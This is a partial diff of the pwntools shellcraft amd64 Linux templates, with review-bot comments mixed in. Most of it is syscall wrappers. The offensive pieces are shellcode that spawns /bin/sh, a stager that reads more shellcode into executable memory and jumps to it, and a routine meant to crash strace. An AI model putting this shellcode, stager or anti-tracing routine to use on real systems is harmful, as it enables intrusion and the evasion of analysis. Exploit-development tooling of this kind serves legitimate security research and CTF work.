b/pwnlib/shellcraft/templates/amd64/linux/setresgid.asm new file mode 100644 index 000000000..268d8c292 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall setresgid. See 'man 2 setresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_setresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setresuid.asm b/pwnlib/shellcraft/templates/amd64/linux/setresuid.asm new file mode 100644 index 000000000..72beec5c7 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setresuid.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall setresuid. See 'man 2 setresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_setresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setrlimit.asm b/pwnlib/shellcraft/templates/amd64/linux/setrlimit.asm new file mode 100644 index 000000000..e82f0d23a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall setrlimit. See 'man 2 setrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_setrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setsid.asm b/pwnlib/shellcraft/templates/amd64/linux/setsid.asm new file mode 100644 index 000000000..b527e2a2d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall setsid. See 'man 2 setsid' for more information. + +Arguments: + + + + ${syscall('SYS_setsid')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setsockopt.asm b/pwnlib/shellcraft/templates/amd64/linux/setsockopt.asm new file mode 100644 index 000000000..3deb3d236 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setsockopt.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall + from pwnlib.shellcraft.amd64 import push +%> +<%page args="sockfd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall setsockopt. See 'man 2 setsockopt' for more information. + +Arguments: + sockfd(int): sockfd + level(int): level + optname(int): optname + optval(void): optval + optlen(int): optlen + + ${syscall('SYS_setsockopt', sockfd, level, optname, optval, optlen)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setsockopt_timeout.asm b/pwnlib/shellcraft/templates/amd64/linux/setsockopt_timeout.asm new file mode 100644 index 000000000..7a6aea9b1 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setsockopt_timeout.asm @@ -0,0 +1,19 @@ + +<% + from pwnlib.shellcraft.amd64.linux import setsockopt + from pwnlib.shellcraft.amd64 import push + from pwnlib.constants import SOL_SOCKET, SO_RCVTIMEO +%> +<%page args="sock, secs"/> +<%docstring> +Invokes the syscall for setsockopt to set a timeout on a socket in seconds. +See 'man 2 setsockopt' for more information. + +Arguments: + sock(int): sock + secs(int): secs + + ${push(0)} + ${push(secs)} + ${setsockopt(sock, 'SOL_SOCKET', 'SO_RCVTIMEO', 'rsp', 16)} + diff --git a/pwnlib/shellcraft/templates/amd64/linux/settimeofday.asm b/pwnlib/shellcraft/templates/amd64/linux/settimeofday.asm new file mode 100644 index 000000000..4673c85ef --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/settimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall settimeofday. See 'man 2 settimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone): tz + + + ${syscall('SYS_settimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setuid.asm b/pwnlib/shellcraft/templates/amd64/linux/setuid.asm new file mode 100644 index 000000000..94fdf7c0d --- /dev/null 
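Review bot: `from pwnlib.shellcraft.amd64 import push` in setsockopt.asm is never used; the template only calls `syscall`, so the import should go to keep this wrapper identical in shape to the other generated ones. The Arguments block also lost the trailing blank lines the sibling templates have, which suggests it was hand-edited; if so, `optval(void)` deserves a word that it is a pointer to the option buffer and `optlen` its byte length.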
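Review bot: The two pushes in setsockopt_timeout.asm build a `struct timeval { tv_sec = secs; tv_usec = 0 }` on the stack (0 pushed first so it sits at the higher address) and hand `rsp` with length 16 to setsockopt, but nothing says so and the 16 bytes are never released, so the caller's stack layout shifts after the call. A comment `/* struct timeval {secs, 0} built at rsp, 16 bytes; the stack is not restored */` above `${push(0)}` captures both. The imports of `SOL_SOCKET` and `SO_RCVTIMEO` are unused because the call passes the names as strings; either pass the constants or drop that import line.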
+++ b/pwnlib/shellcraft/templates/amd64/linux/setuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="uid"/> +<%docstring> +Invokes the syscall setuid. See 'man 2 setuid' for more information. + +Arguments: + uid(uid_t): uid + + + ${syscall('SYS_setuid', uid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sh.asm b/pwnlib/shellcraft/templates/amd64/linux/sh.asm index f962fe526..ad302c2c2 100644 --- a/pwnlib/shellcraft/templates/amd64/linux/sh.asm +++ b/pwnlib/shellcraft/templates/amd64/linux/sh.asm @@ -1,6 +1,11 @@ <% from pwnlib.shellcraft import amd64 %> -<%docstring>Execute /bin/sh +<%docstring> +Execute a different process. -${amd64.pushstr("/bin///sh")} + >>> p = run_assembly(shellcraft.amd64.linux.sh()) + >>> p.sendline('echo Hello') + >>> p.recv() + 'Hello\n' -${amd64.syscall('SYS_execve', 'rsp', 0, 0)} + +${amd64.linux.execve('/bin///sh', 0, 0)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sigaction.asm b/pwnlib/shellcraft/templates/amd64/linux/sigaction.asm new file mode 100644 index 000000000..aa3d52ebb --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sigaction.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="sig, act, oact"/> +<%docstring> +Invokes the syscall sigaction. See 'man 2 sigaction' for more information. + +Arguments: + sig(int): sig + act(sigaction): act + oact(sigaction): oact + + + ${syscall('SYS_sigaction', sig, act, oact)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sigaltstack.asm b/pwnlib/shellcraft/templates/amd64/linux/sigaltstack.asm new file mode 100644 index 000000000..5a9eabd44 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sigaltstack.asm 
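Review bot: The new docstring in sh.asm opens with `Execute a different process.`, which is vaguer than the `Execute /bin/sh` it replaces: the body is fixed to `${amd64.linux.execve('/bin///sh', 0, 0)}` and the template takes no arguments. Suggest `Execute /bin/sh via execve with NULL argv and envp.` as the first line, keeping the doctest below it. The doctest relies on `run_assembly` and `shellcraft` being injected into the doctest namespace; if the docs build does not do that, the example will not run.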
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="ss, oss"/> +<%docstring> +Invokes the syscall sigaltstack. See 'man 2 sigaltstack' for more information. + +Arguments: + ss(sigaltstack): ss + oss(sigaltstack): oss + + + ${syscall('SYS_sigaltstack', ss, oss)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/signal.asm b/pwnlib/shellcraft/templates/amd64/linux/signal.asm new file mode 100644 index 000000000..a267c7adf --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/signal.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="sig, handler"/> +<%docstring> +Invokes the syscall signal. See 'man 2 signal' for more information. + +Arguments: + sig(int): sig + handler(sighandler_t): handler + + + ${syscall('SYS_signal', sig, handler)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sigpending.asm b/pwnlib/shellcraft/templates/amd64/linux/sigpending.asm new file mode 100644 index 000000000..8af7e9b15 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sigpending.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigpending. See 'man 2 sigpending' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigpending', set)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sigprocmask.asm b/pwnlib/shellcraft/templates/amd64/linux/sigprocmask.asm new file mode 100644 index 000000000..929763a3d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sigprocmask.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="how, set, oset, sigsetsize"/> +<%docstring> +Invokes the syscall sigprocmask. See 'man 2 sigprocmask' for more information. + +Arguments: + how(int): how + set(sigset_t): set + oset(sigset_t): oset + sigsetsize(size_t): sigsetsize + + + ${syscall('SYS_rt_sigprocmask', how, set, oset, sigsetsize)} 
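Review bot: sigprocmask.asm invokes `SYS_rt_sigprocmask` but its docstring and man-page reference still say `sigprocmask`; the header should read `Invokes the syscall rt_sigprocmask. See 'man 2 rt_sigprocmask' for more information.` so readers know the `sigsetsize` argument belongs to the rt variant. The page argument `set` also shadows the builtin inside the template's render function, as do `len` in splice.asm/tee.asm and `id` in waitid.asm; harmless here, but worth renaming (e.g. `sigset`) when these templates are regenerated.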
diff --git a/pwnlib/shellcraft/templates/amd64/linux/sigreturn.asm b/pwnlib/shellcraft/templates/amd64/linux/sigreturn.asm index 2b9b7961f..d250f5299 100644 --- a/pwnlib/shellcraft/templates/amd64/linux/sigreturn.asm +++ b/pwnlib/shellcraft/templates/amd64/linux/sigreturn.asm @@ -1,10 +1,8 @@ - <% from pwnlib.shellcraft.amd64.linux import syscall %> <%docstring> Invokes the syscall sigreturn. See 'man 2 sigreturn' for more information. - - ${syscall('SYS_rt_sigreturn', )} + ${syscall('SYS_rt_sigreturn')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sigsuspend.asm b/pwnlib/shellcraft/templates/amd64/linux/sigsuspend.asm new file mode 100644 index 000000000..570d51066 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sigsuspend.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigsuspend. See 'man 2 sigsuspend' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigsuspend', set)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/socket.asm b/pwnlib/shellcraft/templates/amd64/linux/socket.asm new file mode 100644 index 000000000..bb6b3f473 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/socket.asm @@ -0,0 +1,16 @@ +<% from pwnlib.shellcraft import amd64 %> +<% from pwnlib.util.net import sockaddr %> +<% from pwnlib.constants import SOCK_STREAM, SOCK_DGRAM, SYS_socket %> +<%page args="network = 'ipv4', proto = 'tcp'"/> +<%docstring> +Creates a new socket + +<% + sockaddr, length, address_family = sockaddr('127.0.0.1', 1, network) + socktype = { + 'tcp': SOCK_STREAM, + 'udp': SOCK_DGRAM + }.get(proto, proto) +%>\ + /* open new socket */ + ${amd64.linux.syscall(SYS_socket, address_family, socktype, 0)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/splice.asm b/pwnlib/shellcraft/templates/amd64/linux/splice.asm new file mode 100644 index 000000000..633daac25 --- /dev/null 
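Review bot: In socket.asm the tuple assignment `sockaddr, length, address_family = sockaddr('127.0.0.1', 1, network)` rebinds the imported helper to its own result; only `address_family` is used afterwards, so `_, _, address_family = sockaddr('127.0.0.1', 1, network)` says what is actually needed and avoids the shadowing. The docstring `Creates a new socket` should also list the `network` (default 'ipv4') and `proto` (default 'tcp') arguments, since `.get(proto, proto)` silently accepts any value other than 'tcp'/'udp' as the raw socket type.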
+++ b/pwnlib/shellcraft/templates/amd64/linux/splice.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fdin, offin, fdout, offout, len, flags"/> +<%docstring> +Invokes the syscall splice. See 'man 2 splice' for more information. + +Arguments: + fdin(int): fdin + offin(off64_t): offin + fdout(int): fdout + offout(off64_t): offout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_splice', fdin, offin, fdout, offout, len, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/stage.asm b/pwnlib/shellcraft/templates/amd64/linux/stage.asm new file mode 100644 index 000000000..9e54e8c4c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/stage.asm @@ -0,0 +1,58 @@ +<% +from pwnlib.shellcraft.amd64 import push +from pwnlib.shellcraft.amd64.linux import read, readn, mmap +from pwnlib import constants as C +%> +<%page args="fd=0, length=None"/> +<%docstring> +Migrates shellcode to a new buffer. + +Arguments: + fd(int): + Integer file descriptor to recv data from. + Default is stdin (0). + length(int): + Optional buffer length. If None, the first pointer-width + of data received is the length. + +Example: + + >>> p = run_assembly(shellcraft.stage()) + >>> sc = asm(shellcraft.echo("Hello\n", constants.STDOUT_FILENO)) + >>> p.pack(len(sc)) + >>> p.send(sc) + >>> p.recvline() + 'Hello\n' + +<% + protection = C.PROT_READ | C.PROT_WRITE | C.PROT_EXEC + flags = C.MAP_ANONYMOUS | C.MAP_PRIVATE + + assert isinstance(fd, int) +%> +%if length is None: + /* How many bytes should we receive? */ + ${read(fd, 'rsp', 8)} + pop rax + push rax /* Save exact size */ +%else: + ${push(length)} +%endif + + /* Page-align, assume <4GB */ + shr eax, 12 + inc eax + shl eax, 12 + + /* Map it */ + ${mmap(0, 'rax', protection, flags, 0, 0)} + + /* Grab the saved size, save the address */ + pop rbx + push rax + + /* Read in all of the data */ + ${readn(fd, 'rax', 'rbx')} + + /* Go to shellcode */ + ret 
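Review bot: stage.asm validates its argument with `assert isinstance(fd, int)`, which is stripped under `-O` and differs from the `log.error(...)` convention mov.asm uses for bad arguments; `if not isinstance(fd, int): log.error('fd must be an int')` (with `getLogger` imported as in mov.asm) keeps the check live. The `/* Page-align, assume <4GB */` sequence `shr/inc/shl` always adds a page, even when the size is already page-aligned; a comment stating that the over-allocation is intentional would stop the next reader from "fixing" it. The docstring could also state that the length is read as 8 bytes when `length` is None, matching `${read(fd, 'rsp', 8)}`.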
diff --git a/pwnlib/shellcraft/templates/amd64/linux/stat.asm b/pwnlib/shellcraft/templates/amd64/linux/stat.asm new file mode 100644 index 000000000..d0b988fe9 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/stat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat. See 'man 2 stat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_stat', file, buf)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/stat64.asm b/pwnlib/shellcraft/templates/amd64/linux/stat64.asm new file mode 100644 index 000000000..70226c90a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/stat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat64. See 'man 2 stat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_stat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/stime.asm b/pwnlib/shellcraft/templates/amd64/linux/stime.asm new file mode 100644 index 000000000..df451b92a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/stime.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="when"/> +<%docstring> +Invokes the syscall stime. See 'man 2 stime' for more information. + +Arguments: + when(time_t): when + + + ${syscall('SYS_stime', when)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/strace_dos.asm b/pwnlib/shellcraft/templates/amd64/linux/strace_dos.asm new file mode 100644 index 000000000..151916b76 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/strace_dos.asm 
@@ -0,0 +1,40 @@ +<% +from pwnlib.constants import SYS_select +from pwnlib.shellcraft.amd64.linux import syscall, write +from pwnlib.shellcraft.amd64 import push, mov, pushstr +from pwnlib.shellcraft import common +from random import randint +%> +<%docstring> +Kills strace + +<% +large_value = randint(0x10000000, 0xffffffff) +dos_loop1 = common.label('dos_loop1') +dos_loop2 = common.label('dos_loop2') +count = 0x4000 +big_val = randint(0x10000000, 0x7fffffff) +%> + push rbp + mov rbp, rsp + +## Allocate a lot of stack space + ${mov('rcx', count)} +${dos_loop1}: + push -1 + sub rcx, 1 + test rcx, rcx + jnz ${dos_loop1} + + mov byte ptr [rsp], 0xf8 + ${syscall(SYS_select, big_val, 'rsp', 0, 0)} + + ${mov('rcx', count)} +${dos_loop2}: + pop rax + sub rcx, 1 + test rcx, rcx + jnz ${dos_loop2} + + mov rsp, rbp + pop rbp diff --git a/pwnlib/shellcraft/templates/amd64/linux/stty.asm b/pwnlib/shellcraft/templates/amd64/linux/stty.asm new file mode 100644 index 000000000..de71044d1 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/stty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall stty. See 'man 2 stty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_stty', fd, params)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/symlink.asm b/pwnlib/shellcraft/templates/amd64/linux/symlink.asm new file mode 100644 index 000000000..dd752cb7f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/symlink.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall symlink. See 'man 2 symlink' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_symlink', from, to)} 
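Review bot: `large_value` in strace_dos.asm is assigned but never used, and of the imported names only `SYS_select`, `syscall`, `mov` and `common` are referenced — `write`, `push` and `pushstr` are dead imports. Dropping the unused assignment and trimming the import list would make the template easier to audit. Because `randint` is used for `big_val`, the generated assembly differs between renders, which also rules out a doctest; a short comment on that line explaining why the value is randomized would help.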
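Review bot: `<%page args="from, to"/>` in symlink.asm uses `from`, a Python keyword, as a page argument; Mako compiles page args into the parameters of the generated render function, so this template cannot be compiled. Rename it, e.g. `<%page args="target, linkpath"/>` and `${syscall('SYS_symlink', target, linkpath)}`, matching the `symlink(2)` names; symlinkat.asm in the next hunk has the same `from` argument and needs the same fix.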
diff --git a/pwnlib/shellcraft/templates/amd64/linux/symlinkat.asm b/pwnlib/shellcraft/templates/amd64/linux/symlinkat.asm new file mode 100644 index 000000000..b9f004443 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/symlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="from, tofd, to"/> +<%docstring> +Invokes the syscall symlinkat. See 'man 2 symlinkat' for more information. + +Arguments: + from(char): from + tofd(int): tofd + to(char): to + + + ${syscall('SYS_symlinkat', from, tofd, to)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sync.asm b/pwnlib/shellcraft/templates/amd64/linux/sync.asm new file mode 100644 index 000000000..67767e12b --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sync. See 'man 2 sync' for more information. + +Arguments: + + + + ${syscall('SYS_sync')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sync_file_range.asm b/pwnlib/shellcraft/templates/amd64/linux/sync_file_range.asm new file mode 100644 index 000000000..3f151f1dc --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sync_file_range.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, offset, count, flags"/> +<%docstring> +Invokes the syscall sync_file_range. See 'man 2 sync_file_range' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(off64_t): count + flags(unsigned): flags + + + ${syscall('SYS_sync_file_range', fd, offset, count, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/syscall.asm b/pwnlib/shellcraft/templates/amd64/linux/syscall.asm index ad58a4d6a..d6107e42f 100644 --- a/pwnlib/shellcraft/templates/amd64/linux/syscall.asm +++ b/pwnlib/shellcraft/templates/amd64/linux/syscall.asm 
@@ -1,6 +1,7 @@ <% from pwnlib.shellcraft import amd64 - from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context + from pwnlib.constants import Constant + from pwnlib.abi import linux_amd64_syscall as abi %> <%page args="syscall = None, arg0 = None, arg1 = None, arg2 = None, arg3 = None, arg4 = None, arg5 = None"/> <%docstring> @@ -13,41 +14,39 @@ Example: >>> print pwnlib.shellcraft.amd64.linux.syscall('SYS_execve', 1, 'rsp', 2, 0).rstrip() /* call execve(1, 'rsp', 2, 0) */ - push 0x1 + xor r10d, r10d /* 0 */ + push (SYS_execve) /* 0x3b */ + pop rax + push 1 pop rdi - mov rsi, rsp - push 0x2 + push 2 pop rdx - xor r10d, r10d - push 0x3b - pop rax + mov rsi, rsp syscall >>> print pwnlib.shellcraft.amd64.linux.syscall('SYS_execve', 2, 1, 0, -1).rstrip() /* call execve(2, 1, 0, -1) */ - push 0x2 - pop rdi - push 0x1 - pop rsi push -1 pop r10 - push 0x3b + push (SYS_execve) /* 0x3b */ pop rax - cdq /* Set rdx to 0, rax is known to be positive */ + push 2 + pop rdi + push 1 + pop rsi + cdq /* rdx=0 */ syscall >>> print pwnlib.shellcraft.amd64.linux.syscall().rstrip() /* call syscall() */ syscall >>> print pwnlib.shellcraft.amd64.linux.syscall('rax', 'rdi', 'rsi').rstrip() /* call syscall('rax', 'rdi', 'rsi') */ - /* moving rdi into rdi, but this is a no-op */ - /* moving rsi into rsi, but this is a no-op */ - /* moving rax into rax, but this is a no-op */ + /* setregs noop */ syscall >>> print pwnlib.shellcraft.amd64.linux.syscall('rbp', None, None, 1).rstrip() /* call syscall('rbp', ?, ?, 1) */ - push 0x1 - pop rdx mov rax, rbp + push 1 + pop rdx syscall >>> print pwnlib.shellcraft.amd64.linux.syscall( ... 'SYS_mmap', 0, 0x1000, 
@@ -55,25 +54,25 @@ Example: ... 'MAP_PRIVATE | MAP_ANONYMOUS', ... -1, 0).rstrip() /* call mmap(0, 4096, 'PROT_READ | PROT_WRITE | PROT_EXEC', 'MAP_PRIVATE | MAP_ANONYMOUS', -1, 0) */ - xor edi, edi - mov esi, 0x1010101 - xor esi, 0x1011101 - push 0x7 - pop rdx - push 0x22 + push (MAP_PRIVATE | MAP_ANONYMOUS) /* 0x22 */ pop r10 push -1 pop r8 - xor r9d, r9d - push 0x9 + xor r9d, r9d /* 0 */ + push (SYS_mmap) /* 9 */ pop rax + xor edi, edi /* 0 */ + push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */ + pop rdx + mov esi, 0x1010101 /* 4096 == 0x1000 */ + xor esi, 0x1011101 syscall <% append_cdq = False - if isinstance(syscall, (str, unicode)) and syscall.startswith('SYS_'): - syscall_repr = syscall[4:] + "(%s)" + if isinstance(syscall, (str, unicode, Constant)) and str(syscall).startswith('SYS_'): + syscall_repr = str(syscall)[4:] + "(%s)" args = [] else: syscall_repr = 'syscall(%s)' @@ -90,16 +89,13 @@ Example: while args and args[-1] == '?': args.pop() syscall_repr = syscall_repr % ', '.join(args) + + registers = abi.register_arguments + arguments = [syscall, arg0, arg1, arg2, arg3, arg4, arg5] + regctx = dict(zip(registers, arguments)) %>\ /* call ${syscall_repr} */ -% for dst, src in zip(['rdi', 'rsi', 'rdx', 'r10', 'r8', 'r9', 'rax'], [arg0, arg1, arg2, arg3, arg4, arg5, syscall]): - % if dst == 'rdx' and src == 0: - <% append_cdq = True %>\ - % elif src != None: - ${amd64.linux.mov(dst, src)} - % endif -% endfor -% if append_cdq: - cdq /* Set rdx to 0, rax is known to be positive */ -% endif +%if any(a is not None for a in arguments): + ${amd64.setregs(regctx)} +%endif syscall diff --git a/pwnlib/shellcraft/templates/amd64/linux/syslog.asm b/pwnlib/shellcraft/templates/amd64/linux/syslog.asm new file mode 100644 index 000000000..9ddc09b04 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/syslog.asm 
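Review bot: `append_cdq = False` at the top of the `<% %>` block is now dead: the `% if append_cdq:` branch that read it was removed in the following hunk, so the assignment should go too. `regctx = dict(zip(registers, arguments))` also carries `None` values for unset arguments; that relies on `amd64.setregs` skipping `None` entries (the `syscall('rbp', None, None, 1)` doctest suggests it does), and a comment such as `# setregs ignores None, so unset arguments leave their register untouched` would document the dependency.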
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pri, fmt, vararg"/> +<%docstring> +Invokes the syscall syslog. See 'man 2 syslog' for more information. + +Arguments: + pri(int): pri + fmt(char): fmt + vararg(int): vararg + + + ${syscall('SYS_syslog', pri, fmt, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/tee.asm b/pwnlib/shellcraft/templates/amd64/linux/tee.asm new file mode 100644 index 000000000..db7dfb72d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/tee.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fdin, fdout, len, flags"/> +<%docstring> +Invokes the syscall tee. See 'man 2 tee' for more information. + +Arguments: + fdin(int): fdin + fdout(int): fdout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_tee', fdin, fdout, len, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/time.asm b/pwnlib/shellcraft/templates/amd64/linux/time.asm new file mode 100644 index 000000000..2f0f01d8f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/time.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="timer"/> +<%docstring> +Invokes the syscall time. See 'man 2 time' for more information. + +Arguments: + timer(time_t): timer + + + ${syscall('SYS_time', timer)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/timer_create.asm b/pwnlib/shellcraft/templates/amd64/linux/timer_create.asm new file mode 100644 index 000000000..df80fb7dc --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/timer_create.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="clock_id, evp, timerid"/> +<%docstring> +Invokes the syscall timer_create. See 'man 2 timer_create' for more information. + +Arguments: + clock_id(clockid_t): clock_id + evp(sigevent): evp + timerid(timer_t): timerid + + + ${syscall('SYS_timer_create', clock_id, evp, timerid)} 
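Review bot: syslog.asm documents `man 2 syslog` but its argument list `pri, fmt, vararg` is the libc `syslog(3)` prototype, not the syscall's `(int type, char *bufp, int len)`; the generated template therefore passes a format string where the kernel expects a buffer pointer and a length. Either regenerate it from the syscall prototype, `<%page args="log_type, bufp, length"/>` and `${syscall('SYS_syslog', log_type, bufp, length)}`, or drop it, since it cannot be called correctly as written. The same prototype-vs-syscall mismatch is worth checking in ulimit.asm, whose `cmd, vararg` arguments likewise come from a libc wrapper.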
diff --git a/pwnlib/shellcraft/templates/amd64/linux/timer_delete.asm b/pwnlib/shellcraft/templates/amd64/linux/timer_delete.asm new file mode 100644 index 000000000..3069254d3 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/timer_delete.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_delete. See 'man 2 timer_delete' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_delete', timerid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/timer_getoverrun.asm b/pwnlib/shellcraft/templates/amd64/linux/timer_getoverrun.asm new file mode 100644 index 000000000..34fd108d1 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/timer_getoverrun.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_getoverrun. See 'man 2 timer_getoverrun' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_getoverrun', timerid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/timer_gettime.asm b/pwnlib/shellcraft/templates/amd64/linux/timer_gettime.asm new file mode 100644 index 000000000..13f51e584 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/timer_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="timerid, value"/> +<%docstring> +Invokes the syscall timer_gettime. See 'man 2 timer_gettime' for more information. + +Arguments: + timerid(timer_t): timerid + value(itimerspec): value + + + ${syscall('SYS_timer_gettime', timerid, value)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/timer_settime.asm 